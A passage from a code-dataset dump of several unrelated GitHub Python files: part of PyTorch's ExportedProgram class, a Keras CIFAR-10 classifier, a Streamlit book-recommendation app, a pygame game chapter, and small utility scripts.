outputs with exported output tree spec: \\n\"\n f\"{self.call_spec.out_spec}\\n\"\n \"but actually got outputs with tree spec of: \\n\"\n f\"{received_spec}\"\n )\n finally:\n ix = 0\n for buffer in self.graph_signature.buffers_to_mutate.values():\n self.state_dict[buffer] = mutated_buffers[ix]\n ix += 1\n return res\n\n def __str__(self) -> str:\n graph_module = self.graph_module.print_readable(print_output=False).replace(\n \"\\n\", \"\\n \"\n )\n string = (\n \"ExportedProgram:\\n\"\n f\" {graph_module}\\n\"\n f\"Graph signature: {self.graph_signature}\\n\"\n f\"Range constraints: {self.range_constraints}\\n\"\n f\"Equality constraints: {self.equality_constraints}\\n\"\n )\n return string\n\n def module(self, *, flat: bool = True) -> torch.nn.Module:\n \"\"\"\n Returns a self contained GraphModule with all the parameters/buffers inlined.\n \"\"\"\n from torch._export.exported_program import unlift_exported_program_lifted_states\n from torch._export.unflatten import unflatten\n\n if flat:\n return unlift_exported_program_lifted_states(self)\n else:\n return unflatten(self)\n\n def run_decompositions(\n self, decomp_table: Optional[Dict[torch._ops.OperatorBase, Callable]] = None\n ) -> \"ExportedProgram\":\n \"\"\"\n Run a set of decompositions on the exported program and returns a new\n exported program. By default we will run the Core ATen decompositions to\n get operators in the\n `Core ATen Operator Set `_.\n\n For now, we do not decompose joint graphs.\n \"\"\"\n from torch._decomp import core_aten_decompositions\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n _AddRuntimeAssertionsForInlineConstraintsPass,\n InputDim,\n )\n from torch._export.passes.lift_constant_tensor_pass import (\n lift_constant_tensor_pass,\n )\n from torch._export.passes.replace_sym_size_ops_pass import (\n _replace_sym_size_ops_pass,\n )\n from torch._functorch.aot_autograd import aot_export_module\n\n def _get_placeholders(gm):\n placeholders = []\n for node in gm.graph.nodes:\n if node.op != \"placeholder\":\n break\n placeholders.append(node)\n return placeholders\n\n decomp_table = decomp_table or core_aten_decompositions()\n\n old_placeholders = _get_placeholders(self.graph_module)\n fake_args = [node.meta[\"val\"] for node in old_placeholders]\n\n buffers_to_remove = [name for name, _ in self.graph_module.named_buffers()]\n for name in buffers_to_remove:\n delattr(self.graph_module, name)\n # TODO(zhxhchen17) Return the new graph_signature directly.\n gm, graph_signature = aot_export_module(\n self.graph_module, fake_args, decompositions=decomp_table, trace_joint=False\n )\n\n # Update the signatures with the new placeholder names in case they\n # changed when calling aot_export\n new_placeholders = _get_placeholders(gm)\n assert len(new_placeholders) == len(old_placeholders)\n old_new_placeholder_map = {\n old_node.name: new_node.name\n for old_node, new_node in zip(old_placeholders, new_placeholders)\n }\n old_outputs = list(self.graph.nodes)[-1].args[0]\n new_outputs = list(gm.graph.nodes)[-1].args[0]\n assert len(new_outputs) == len(old_outputs)\n old_new_output_map = {\n old_node.name: new_node.name\n for old_node, new_node in zip(old_outputs, new_outputs)\n }\n\n def make_argument_spec(old_node, node) -> ArgumentSpec:\n if \"val\" not in node.meta:\n assert len(node.users) == 0\n val = old_node.meta[\"val\"]\n else:\n val = node.meta[\"val\"]\n if isinstance(val, torch.Tensor):\n return TensorArgument(name=node.name)\n elif isinstance(val, torch.SymInt):\n return SymIntArgument(name=node.name)\n else:\n return ConstantArgument(value=val)\n\n input_specs, output_specs = _sig_to_specs(\n user_inputs={\n old_new_placeholder_map[inp] for inp in self.graph_signature.user_inputs\n },\n inputs_to_parameters={\n old_new_placeholder_map[inp]: param\n for inp, param in self.graph_signature.inputs_to_parameters.items()\n },\n inputs_to_buffers={\n old_new_placeholder_map[inp]: buffer\n for inp, buffer in self.graph_signature.inputs_to_buffers.items()\n },\n user_outputs={\n old_new_output_map[out] for out in self.graph_signature.user_outputs\n },\n buffer_mutations={\n old_new_output_map[out]: buffer\n for out, buffer in self.graph_signature.buffers_to_mutate.items()\n },\n grad_params={},\n grad_user_inputs={},\n loss_output=None,\n inputs=[\n make_argument_spec(old_placeholders[i], node)\n for i, node in enumerate(gm.graph.nodes)\n if node.op == \"placeholder\"\n ],\n outputs=[\n make_argument_spec(old_outputs[i], node)\n for i, node in enumerate(\n pytree.tree_leaves(next(iter(reversed(gm.graph.nodes))).args)\n )\n ],\n )\n\n new_graph_signature = ExportGraphSignature(\n input_specs=input_specs, output_specs=output_specs\n )\n # NOTE: aot_export adds symint metadata for placeholders with int\n # values; since these become specialized, we replace such metadata with\n # the original values.\n # Also, set the param/buffer metadata back to the placeholders.\n for old_node, new_node in zip(old_placeholders, new_placeholders):\n if not isinstance(old_node.meta[\"val\"], torch.Tensor):\n new_node.meta[\"val\"] = old_node.meta[\"val\"]\n\n if (\n new_node.target in new_graph_signature.inputs_to_parameters\n or new_node.target in new_graph_signature.inputs_to_buffers\n ):\n for k, v in old_node.meta.items():\n new_node.meta[k] = v\n\n # TODO unfortunately preserving graph-level metadata is not\n # working well with aot_export. So we manually copy it.\n # (The node-level meta is addressed above.)\n gm.meta.update(self.graph_module.meta)\n\n new_range_constraints = _get_updated_range_constraints(gm)\n\n new_equality_constraints = [\n (\n InputDim(old_new_placeholder_map[inp_dim1.input_name], inp_dim1.dim),\n InputDim(old_new_placeholder_map[inp_dim2.input_name], inp_dim2.dim),\n )\n for inp_dim1, inp_dim2 in self.equality_constraints\n ]\n\n state_dict = self.state_dict.copy()\n lift_constant_tensor_pass(gm, new_graph_signature, state_dict)\n _replace_sym_size_ops_pass(gm)\n exported_program = ExportedProgram(\n gm,\n gm.graph,\n new_graph_signature,\n state_dict,\n new_range_constraints,\n new_equality_constraints,\n copy.deepcopy(self.module_call_graph),\n self.example_inputs,\n self.verifier,\n )\n\n if len(new_range_constraints) > 0 or len(new_equality_constraints) > 0:\n exported_program = exported_program._transform(\n _AddRuntimeAssertionsForInlineConstraintsPass(\n new_range_constraints, new_equality_constraints\n )\n )\n\n return exported_program\n\n def _transform(self, *passes: PassType) -> \"ExportedProgram\":\n pm = PassManager(list(passes))\n res = pm(self.graph_module)\n transformed_gm = res.graph_module if res is not None else self.graph_module\n assert transformed_gm is not None\n\n if transformed_gm is self.graph_module and not res.modified:\n return self\n\n # TODO(zhxchen17) Remove this.\n def _get_updated_graph_signature(\n old_signature: ExportGraphSignature,\n new_gm: torch.fx.GraphModule,\n ) -> ExportGraphSignature:\n \"\"\"\n Update the graph signature's user_input/user_outputs.\n \"\"\"\n new_graph_inputs = [\n node.name for node in new_gm.graph.nodes if node.op == \"placeholder\"\n ]\n num_inputs = (\n len(old_signature.parameters)\n + len(old_signature.buffers)\n + len(\n [\n s\n for s in old_signature.input_specs\n if s.kind == InputKind.USER_INPUT\n ]\n )\n )\n\n assert len(new_graph_inputs) == num_inputs, (\n f\"Number of input nodes changed from {len(new_graph_inputs)} \"\n f\"to {num_inputs} after transformation. This transformation \"\n \"is currently not supported.\"\n )\n num_param_buffers = len(old_signature.buffers) + len(\n old_signature.parameters\n )\n new_user_inputs = new_graph_inputs[num_param_buffers:]\n\n output_node = list(new_gm.graph.nodes)[-1]\n assert output_node.op == \"output\"\n new_graph_outputs = [arg.name for arg in output_node.args[0]]\n\n assert len(new_graph_outputs) == len(old_signature.buffers_to_mutate) + len(\n [\n s\n for s in old_signature.output_specs\n if s.kind == OutputKind.USER_OUTPUT\n ]\n ), (\n f\"Number of output nodes changed from {len(new_graph_outputs)} \"\n f\"to {len(old_signature.buffers_to_mutate) + len(old_signature.user_outputs)} \"\n \"after transformation. This transformation is currently not supported.\"\n )\n new_user_outputs = new_graph_outputs[len(old_signature.buffers_to_mutate) :]\n\n def make_argument_spec(node) -> ArgumentSpec:\n val = node.meta[\"val\"]\n if isinstance(val, torch.Tensor):\n return TensorArgument(name=node.name)\n elif isinstance(val, torch.SymInt):\n return SymIntArgument(name=node.name)\n else:\n return ConstantArgument(value=val)\n\n input_specs, output_specs = _sig_to_specs(\n user_inputs=set(new_user_inputs),\n inputs_to_parameters=old_signature.inputs_to_parameters,\n inputs_to_buffers=old_signature.inputs_to_buffers,\n user_outputs=set(new_user_outputs),\n buffer_mutations=old_signature.buffers_to_mutate,\n grad_params={},\n grad_user_inputs={},\n loss_output=None,\n inputs=[\n make_argument_spec(node)\n for node in transformed_gm.graph.nodes\n if node.op == \"placeholder\"\n ],\n outputs=[\n make_argument_spec(node)\n for node in pytree.tree_flatten(\n next(iter(reversed(transformed_gm.graph.nodes))).args\n )[0]\n ],\n )\n new_signature = ExportGraphSignature(\n input_specs=input_specs, output_specs=output_specs\n )\n return new_signature\n\n transformed_ep = ExportedProgram(\n transformed_gm,\n transformed_gm.graph,\n _get_updated_graph_signature(self.graph_signature, transformed_gm),\n self.state_dict,\n _get_updated_range_constraints(transformed_gm),\n copy.deepcopy(self.equality_constraints),\n copy.deepcopy(self._module_call_graph),\n self.example_inputs,\n self.verifier,\n )\n transformed_ep.graph_module.meta.update(self.graph_module.meta)\n transformed_ep.graph_module.meta.update(res.graph_module.meta)\n return transformed_ep\n\n def _check_input_constraints(self, *args):\n from torch._export.passes.add_runtime_assertions_for_constraints_pass import (\n _AddRuntimeAssertionsForConstraintsPass,\n )\n\n # TODO(zhxchen17) Don't generate a runtime graph on the fly.\n _assertion_graph = torch.fx.GraphModule({}, torch.fx.Graph())\n for p in self.graph.nodes:\n if p.op != \"placeholder\":\n continue\n new_p = _assertion_graph.graph.placeholder(p.name)\n new_p.meta = p.meta\n _assertion_graph.graph.output(())\n _assertion_graph_res = _AddRuntimeAssertionsForConstraintsPass(\n self.range_constraints,\n self.equality_constraints,\n )(_assertion_graph)\n assert _assertion_graph_res is not None\n _assertion_graph = _assertion_graph_res.graph_module\n _assertion_graph(*args)\n\n def _validate(self):\n self.verifier().check(self)\n\n\ndef _get_updated_range_constraints(\n gm: torch.fx.GraphModule,\n) -> \"Dict[sympy.Symbol, Any]\":\n def get_shape_env(gm):\n vals = [\n node.meta[\"val\"]\n for node in gm.graph.nodes\n if node.meta.get(\"val\", None) is not None\n ]\n from torch._guards import detect_fake_mode\n\n fake_mode = detect_fake_mode(vals)\n if fake_mode is not None:\n return fake_mode.shape_env\n for v in vals:\n if isinstance(v, torch.SymInt):\n return v.node.shape_env\n\n shape_env = get_shape_env(gm)\n if shape_env is None:\n return {}\n range_constraints = {\n k: v\n for k, v in shape_env.var_to_range.items()\n if k not in shape_env.replacements\n }\n return range_constraints\n","repo_name":"pytorch/pytorch","sub_path":"torch/export/exported_program.py","file_name":"exported_program.py","file_ext":"py","file_size_in_byte":23934,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"17323174106","text":"from keras.datasets import cifar10\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential, load_model\r\nfrom keras import layers\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom keras.utils import np_utils \r\nfrom keras.constraints import maxnorm\r\nimport random\r\nimport numpy as np\r\n\r\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n\r\nclasses=['Aeroplane','Automobile','Bird','Cat','Deer','Dog','Frog','Horse','Ship','Truck']\r\n\r\nprint('Train samples count:', X_train.shape[0])\r\nprint('Test samples count:', X_test.shape[0])\r\n\r\nX_train=X_train.astype('float32')\r\nX_test=X_test.astype('float32')\r\n \r\nX_train=X_train/255.0 #normalize a image 0...255 to 0....1\r\nX_test=X_test/255.0\r\n\r\nY_train = np_utils.to_categorical(y_train,10) # One-hot encoding example 6 to [0 0 0 0 0 1 0 0 0 0]\r\nY_test = np_utils.to_categorical(y_test,10)\r\n\r\nopt = SGD(lr=0.001, momentum=0.9)\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', input_shape=(32,32,3), kernel_constraint=maxnorm(3)))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', kernel_constraint=maxnorm(3)))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(layers.Dropout(0.3))\r\n\r\nmodel.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(layers.Dropout(0.5))\r\n\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(64, activation='relu'))\r\nmodel.add(layers.BatchNormalization())\r\nmodel.add(layers.Dropout(0.5))\r\nmodel.add(layers.Dense(10, activation='softmax', kernel_constraint=maxnorm(3)))\r\nmodel.summary()\r\n\r\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n\r\n#model.fit(X_train,Y_train,validation_data=(X_test,Y_test),epochs=10,batch_size=32)\r\n#model.save('my_model.h5')\r\n\r\n\r\nmodel1 = load_model(\"my_model.h5\")\r\nloss,acc=model1.evaluate(X_test,Y_test)\r\n\r\nprint(\"Model Accuracy : \"+str(acc*100))\r\nprint(\"Model Loss : \"+str(loss))\r\n\r\nresult = model1.predict(X_test)\r\nresult_list_index = np.argmax(result, axis=1)\r\n\r\nfig, axes = plt.subplots(4, 4, figsize=(10,10))\r\naxes = axes.ravel()\r\nrandom_int = random.randint(0, 9983)\r\nindex = 0\r\nfor i in range(random_int, random_int + 16):\r\n axes[index].imshow(X_test[i])\r\n axes[index].set_title(\"True Class:\" + str(classes[np.argmax(Y_test[i])]) + \" \\nPredict Class:\" + str(classes[result_list_index[i]])) \r\n axes[index].axis('off')\r\n plt.subplots_adjust(left=0.1,bottom=0.1,right=0.9, top=0.9, wspace=0.5, hspace=0.4)\r\n index +=1\r\n \r\n \r\n\r\n","repo_name":"ozanhasas/Image-Classification","sub_path":"CIDL.py","file_name":"CIDL.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6211984029","text":"\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\nimport requests\nimport time \nimport json\nimport urllib\nimport os\n\n# Function for loading animation\ndef load_lottieurl(url):\n r = requests.get(url)\n if r.status_code != 200:\n return None\n return r.json()\n\n# Function for querying Hugging Face models\ndef query_with_retry(payload, API_URL, headers, max_retries=3, delay=15):\n for _ in range(max_retries):\n response = requests.post(API_URL, headers=headers, json=payload)\n \n if response.status_code == 200: # If successful\n return response.json()\n else:\n st.warning(f\"Waiting for the model's response from HuggingFace API. Retrying in {delay} seconds...\")\n time.sleep(delay)\n st.error(\"Apologies. It seems that HuggingFace APIs are currenly overloaded\")\n\n# Function to fetch book details using Google Books API\ndef fetch_book_info(title):\n title = urllib.parse.quote(title) # URL encode the book title\n Goog_API_Key = os.environ['Goog_API_Key']\n response = urllib.request.urlopen(f'https://www.googleapis.com/books/v1/volumes?q={title}&key={Goog_API_Key}')\n data = json.load(response)\n info = data['items'][0]['volumeInfo'] # Get info of the first matched book\n return info['title'], info['imageLinks']['thumbnail'], info['previewLink']\n\n# Function for classifying and generating recommendations\ndef classify_and_recommend(text):\n progress_bar = st.progress(0)\n Hugg_API_Key = os.environ['Hugg_API_Key']\n headers = {\"Authorization\": f\"Bearer {Hugg_API_Key}\"}\n \n # Emotion Classification\n progress_bar.text(\"Classifying emotion...\")\n API_URL = \"https://api-inference.huggingface.co/models/SamLowe/roberta-base-go_emotions\"\n\n output_1 = query_with_retry({\"inputs\": text,}, API_URL, headers)\n emotion = output_1[0][0].get('label')\n progress_bar.progress(50)\n\n supported_emotions = [\"fear\", \"sadness\"]\n if emotion not in supported_emotions:\n st.error(f\"The emotion {emotion} is not currently supported. Please try with a different text.\")\n else:\n\n # Ailment Classification\n progress_bar.text(\"Predicting ailment...\")\n API_URL = \"https://api-inference.huggingface.co/models/facebook/bart-large-mnli\"\n \n if emotion == 'fear':\n candidate_labels = ['fear of death', 'fear of flying']\n elif emotion == 'sadness':\n candidate_labels = ['depression', 'grief']\n\n output_2 = query_with_retry({\n \"inputs\": text,\n \"parameters\": {\"candidate_labels\": candidate_labels},\n }, API_URL, headers)\n ailment = output_2.get('labels')[0]\n progress_bar.progress(100)\n time.sleep(1)\n progress_bar.empty()\n\n # Books recommended by The Novel Cure\n if ailment == 'fear of death':\n book_list = ['White Noise', 'Hundred Years of Solitude']\n elif ailment == 'fear of flying':\n book_list = [\"Night Flight\", \"The Count of Monte Cristo\", \"The Magus\", \"In the Woods\", \"Carter Beats the Devil\"]\n elif ailment == 'depression':\n book_list = ['The Unbearable Lightness of Being', 'The Bell Jar', 'Mr. Chartwell', 'The Marriage Plot']\n elif ailment == 'grief':\n book_list = [\"After You'd Gone\", 'Incendiary', 'Extremely Loud & Incredibly Close', 'What I Loved']\n\n\n # Fetch book info from Google Books API (You can replace this part with static list as you needed)\n progress_bar.text(\"Fetching book information...\")\n book_info_list = []\n for book in book_list:\n title, image, url = fetch_book_info(book)\n book_info_list.append((title, image, url))\n progress_bar.progress(100)\n time.sleep(1)\n progress_bar.empty()\n\n return emotion, ailment, book_info_list\n\n# Load Animation\nlottie_anim = load_lottieurl(\"https://lottie.host/fa433011-9a30-4fcc-a03e-a7c9c76a917b/feBor8W1MA.json\")\n\n# Page Configuration\nst.set_page_config(page_title=\"Pneuma\", page_icon=\"📕\", layout=\"wide\")\nheader_text = \"Pneuma\"\nst.markdown(f\"

    {header_text}

    \", unsafe_allow_html=True)\nst.markdown(\"##### Befriend a Book.. And You Will Never Walk Alone\")\n\n# Entry Box & Animation\nwith st.container():\n col1, col2 = st.columns([1, 1])\n with col1:\n with st.form('my_form'):\n text = st.text_area('Enter tweets here:', 'The world keeps spinning, indifferent to my loss. The sun still rises, the birds still sing, but the joy in these simple miracles of life seems to have faded.')\n submitted = st.form_submit_button('Get Books')\n if submitted: \n emotion, ailment, book_info_list = classify_and_recommend(text)\n\n with col2:\n st_lottie(lottie_anim, height=300, key=\"coding\")\n\n# Display Model Results\nif submitted:\n st.markdown(\"### Predominant Emotion:\")\n st.markdown(emotion)\n st.markdown(\"### Predicted Ailment:\")\n st.markdown(ailment)\n # Display Recommended Books\n st.markdown(\"

    Recommended Books

    \", unsafe_allow_html=True)\n st.markdown(\"
    \", unsafe_allow_html=True) # Add an empty line\n st.markdown(\"
    \", unsafe_allow_html=True) # Add an empty line\n cols = st.columns(len(book_info_list)) # Create as many columns as there are books\n for i, info in enumerate(book_info_list):\n cols[i].markdown(f'', unsafe_allow_html=True)\n cols[i].markdown(f\"
    {info[0]}
    \", unsafe_allow_html=True)\n\nst.markdown(\"---\") # Optional horizontal line for separation\nst.markdown(\"Developed by **Abdullah Garatli**\")\n","repo_name":"garatli/pneuma","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27585295550","text":"import numpy as np\nimport pandas as pd\n\n\n\nclass gridsearch:\n def __init__(self, est, params, cv):\n\n # define parameter search grid\n param_values = []\n for key in params.keys():\n param_values.append(params[key])\n\n self.params = np.array(np.meshgrid(a,b,c)).T.reshape(-1,3)\n","repo_name":"jahanpd/ML-for-Predicting-Cardiac-Surgery-Associated-AKI","sub_path":"auxillary/gridsearch.py","file_name":"gridsearch.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22861784669","text":"from scraper import scrape\nfrom sys import argv, exit\n\n\ndef main():\n if len(argv) < 2:\n print(\"Error: expected URL\")\n exit(1)\n targetUrl = argv[1]\n\n print(scrape(targetUrl))\n\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zakini/Sainsburys-Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2779396080","text":"import pygame\nfrom sources import default,tools,setup\nfrom states import roles,goods,load_js,npc,chat_board,items_interation\n\n\n\n\nclass Cpt3 :\n def __init__(self):\n self.state_name = 'cpt3'\n self.finish = False\n self.next = 'cpt4'\n self.cpt3_background()\n self.setup_role()\n self.setup_npc()\n\n self.judge = False\n self.num_mes = 0\n self.mes_trigger = False\n self.mage_judge = False\n self.code2 = False\n self.letter_judge = False\n self.rope_judge = False\n self.monument_judge = False\n self.sword_judge = False\n self.sword =False\n self.teleport_judge = False\n self.teleport = False\n self.speak = False\n self.end = False\n self.chat_npc = 0\n self.chat_sound = pygame.mixer.Sound('./data/sounds/chat.mp3')\n\n\n self.cpt3_map = load_js.load_map('./states/chapter3.json') # [{\"x\": 293, \"y\": 379, \"width\": 211, \"height\": 43}]\n tools.trans_pixis(self.cpt3_map, default.CPT1_PIXIS_X, default.CPT1_PIXIS_Y)\n self.setup_goods()\n self.setup_item()\n\n def setup_goods(self):\n '''\n set up all the group of sprite\n :return:\n '''\n self.cpt3_group = pygame.sprite.Group()\n for item in self.cpt3_map :\n self.cpt3_group.add(goods.Goods(item['x'],item['y'],item['width'],item['height']))\n print(self.cpt3_group)\n\n def cpt3_background(self):\n self.image = pygame.image.load('./data/map/chapter_3.png')\n self.image = pygame.transform.scale(self.image, (default.SCREEN_WIDTH, default.SCREEN_HEIGHT))\n\n\n def setup_role(self):\n '''\n set up the hero in the chapter_3\n :return:\n '''\n self.role = roles.Role(default.HUMAN_PICTURE[2])\n self.role.current_structure = self.role.stop_structure\n self.role.rect.x = 539\n self.role.rect.y = 569\n\n def setup_npc(self):\n\n self.mage = npc.NPC(\"Bard——Yang Yu\",default.info[4],default.HUMAN_PICTURE[3])\n self.chat = chat_board.Chat()\n self.mage.rect.x = 985\n self.mage.rect.y = 435\n self.sword_img = pygame.image.load('./data/item/sword.png')\n\n self.chat_npc_list = [self.mage]\n self.chat_npc_list.append(items_interation.Item('monument1'))\n self.chat_npc_list.append(items_interation.Item('monument2'))\n self.chat_npc_list.append(items_interation.Item('Letter3'))\n self.chat_npc_list.append(items_interation.Item('row'))\n self.chat_npc_list.append(items_interation.Item('statue'))\n self.chat_npc_list.append(items_interation.Item('teleportation1'))\n self.chat_npc_list.append(items_interation.Item('teleportation2'))\n #[ 0mage , 1monument1 , 2monument2 , 3letter , 4rope , 5sword , 6teleport1 , 7teleport2]\n\n def setup_item(self):\n pass\n\n def find_talk(self,keys):\n '''\n judge which item or npc need to interact with hero\n :param keys:\n :return:\n '''\n # mage judge\n if(self.role.rect.x > 900 and self.role.rect.x <918) and (self.role.rect.y > 420 and self.role.rect.y < 447):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.mage_judge = True\n # rope judge\n if (self.role.rect.x > 525 and self.role.rect.x < 555) and (self.role.rect.y > 122 and self.role.rect.y < 137):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.rope_judge =True\n #sword judge\n if (self.role.rect.x > 130 and self.role.rect.x < 160) and (self.role.rect.y > 148 and self.role.rect.y < 180):\n if keys[pygame.K_a]:\n if self.sword ==True:\n self.judge = True\n default.chat_sound_start = True\n self.sword_judge = True\n #letter judge\n if (self.role.rect.x > 575 and self.role.rect.x < 600) and (self.role.rect.y > 537 and self.role.rect.y < 570):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.letter_judge =True\n #monument judge\n if (self.role.rect.x > 655 and self.role.rect.x < 700) and (self.role.rect.y > 368 and self.role.rect.y < 381):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.monument_judge =True\n #teleport judge\n if (self.role.rect.x > 813 and self.role.rect.x < 875) and (self.role.rect.y > 135 and self.role.rect.y < 221):\n if keys[pygame.K_a]:\n self.judge = True\n default.chat_sound_start = True\n self.teleport_judge = True\n\n def draw_items(self,judge,surface,keys):\n if self.sword:\n if default.HERO_ITEM['sword'] != 1:\n surface.blit(self.sword_img, (129, 135))\n else:\n pass\n if judge:\n\n #mage\n if self.mage_judge:\n self.mage_judge = False\n self.chat_npc = self.chat_npc_list[0]\n self.code2 = True\n self.speak = True\n #monument\n if self.monument_judge:\n self.monument_judge = False\n if self.code2 == False:\n self.chat_npc = self.chat_npc_list[1]\n self.speak = True\n else:\n self.chat_npc = self.chat_npc_list[2]\n self.speak = True\n self.teleport = True\n #letter\n if self.letter_judge:\n surface.blit(default.ITEM_LIST[3], (100, 75))\n if keys[pygame.K_SPACE]:\n self.letter_judge = False\n self.chat_npc = self.chat_npc_list[3]\n self.speak = True\n #rope\n if self.rope_judge:\n self.rope_judge = False\n self.chat_npc =self.chat_npc_list[4]\n self.speak = True\n if default.HERO_ITEM[\"sword\"] ==0:\n self.sword = True\n #sword\n if self.sword_judge:\n self.sword_judge =False\n default.HERO_ITEM[\"sword\"] = 1\n self.chat_npc = self.chat_npc_list[5]\n self.speak = True\n self.sword = False\n #teleport\n if self.teleport_judge:\n self.teleport_judge = False\n if self.teleport == False:\n self.chat_npc = self.chat_npc_list[6]\n self.speak = True\n else :\n self.chat_npc = self.chat_npc_list[7]\n self.speak = True\n # [ 0mage , 1monument1 , 2monument2 , 3letter , 4rope , 5sword , 6teleport1 , 7teleport2]\n if self.speak:\n for key,value in self.chat_npc.chat_mes[self.num_mes].items():\n if key == 'Warrior':\n default.CHAT_START_Y = 670\n self.chat.print_mes(self.chat_npc.chat_mes[self.num_mes][key],surface)\n default.CHAT_START_Y = 570\n if self.chat_npc.attri == 'npc':\n surface.blit(self.chat_npc.npc_pit,(default.HUMAN_PICT_WIDTH,default.HUMAN_PICT_HEIGHT))\n surface.blit(self.role.hero_pit,(default.HERO_PICT_WIDTH,default.HERO_PICT_HEIGHT))\n\n if len(self.chat_npc.chat_mes) == (self.num_mes +1):\n if self.teleport:\n if(self.role.rect.x > 813 and self.role.rect.x < 875) and (self.role.rect.y > 135 and self.role.rect.y < 221):\n if keys[pygame.K_SPACE]:\n self.num_mes = 0\n self.judge = False\n self.mes_trigger = False\n self.mage_judge = False\n self.speak = False\n self.finish = True\n return\n if keys[pygame.K_SPACE]:\n self.num_mes = 0\n self.judge = False\n self.mes_trigger = False\n self.mage_judge = False\n self.speak = False\n return\n if len(self.chat_npc.chat_mes) > (self.num_mes):\n if keys[pygame.K_SPACE]:\n self.mes_trigger = True\n if keys[pygame.K_SPACE] == False and self.mes_trigger == True:\n self.num_mes += 1\n self.mes_trigger = False\n\n\n def update_position(self):\n\n self.role.rect.x += self.role.x_vel\n self.x_collide()\n self.role.rect.y += self.role.y_vel\n\n self.y_collide()\n # y=730\n\n\n\n print(self.role.rect)\n\n def x_collide(self):\n '''\n judge whether there is collision in the x_axis. if yes, do something\n :return:\n '''\n self.goods_collision = pygame.sprite.spritecollideany(self.role, self.cpt3_group)\n\n if self.goods_collision:\n if self.role.rect.x < self.goods_collision.rect.x:\n self.role.rect.right = self.goods_collision.rect.left\n else:\n self.role.rect.left = self.goods_collision.rect.right\n self.role.x_vel = 0\n\n def y_collide(self):\n '''\n judge whether there is collision in the x_axis. if yes, do somethi\n :return:\n '''\n self.goods_collision = pygame.sprite.spritecollideany(self.role, self.cpt3_group)\n if self.goods_collision:\n if self.role.rect.bottom < self.goods_collision.rect.bottom:\n self.role.rect.bottom = self.goods_collision.rect.top\n else:\n self.role.rect.top = self.goods_collision.rect.bottom\n self.role.y_vel = 0\n\n def update(self,surface,keys):\n if self.judge != 1:\n self.role.update(keys)\n tools.play_chatsound(default.chat_sound_start,self.chat_sound)\n self.update_position()\n self.find_talk(keys)\n self.mage.update()\n self.draw(surface,keys)\n\n\n\n def draw(self,surface,keys):\n surface.blit(self.image,(0,0))\n surface.blit(self.role.role_image,self.role.rect)\n surface.blit(self.mage.role_image,self.mage.rect)\n self.draw_items(self.judge,surface,keys)\n pass","repo_name":"johnycoco1212/radiant_knight","sub_path":"states/chapter_3.py","file_name":"chapter_3.py","file_ext":"py","file_size_in_byte":10680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"303791674","text":"import os\nimport io\nimport re\nimport sys\nimport pdb\nimport time\nimport types\nimport socket\nimport signal\nimport psutil\nimport logging\nimport argparse\nimport textwrap\nimport threading\nimport traceback\nimport contextlib\nimport pkg_resources\n\nfrom datetime import datetime\nfrom fractions import Fraction\nfrom threading import Thread, Lock\nfrom collections import Counter, deque\nfrom functools import total_ordering, wraps, partial\nfrom subprocess import check_output, call, Popen, PIPE\nfrom os.path import dirname, basename, isfile, isdir, exists, normpath, realpath, abspath, splitext, join, expanduser\n\nfrom .loger import *\nfrom .config import which\nfrom ._version import __version__\n\nPY3 = sys.version_info.major == 3\n\nif not PY3:\n from Queue import Queue, Empty\nelse:\n from queue import Queue, Empty\n\n\nQSUB_JOB_ID_DECODER = re.compile(\"Your job (\\d+) \\(.+?\\) has been submitted\")\n\n\nclass JobFailedError(Exception):\n\n def __init__(self, msg=\"\", jobs=None):\n self.msg = msg\n self.failed_jobs = jobs and [j for j in jobs if j.is_fail]\n\n def __str__(self):\n if self.msg:\n return self.msg\n fj = self.failed_jobs\n fj_names = [j.jobname for j in fj]\n fj_logs = [j.logfile for j in fj]\n return \"{} jobs {} failed, please check in logs: {}\".format(len(fj), fj_names, fj_logs)\n\n\nclass QsubError(Exception):\n pass\n\n\nclass JobRuleError(Exception):\n pass\n\n\nclass JobOrderError(Exception):\n pass\n\n\nclass JobQueue(Queue):\n\n def _init(self, maxsize):\n self._queue = set()\n\n def _qsize(self):\n return len(self._queue)\n\n def _put(self, item):\n self._queue.add(item)\n\n def _get(self, name=None):\n if name is not None:\n if name in self._queue:\n self._queue.remove(name)\n return name\n else:\n raise KeyError(name)\n return self._queue.pop()\n\n def __contains__(self, item):\n return item in self._queue\n\n def 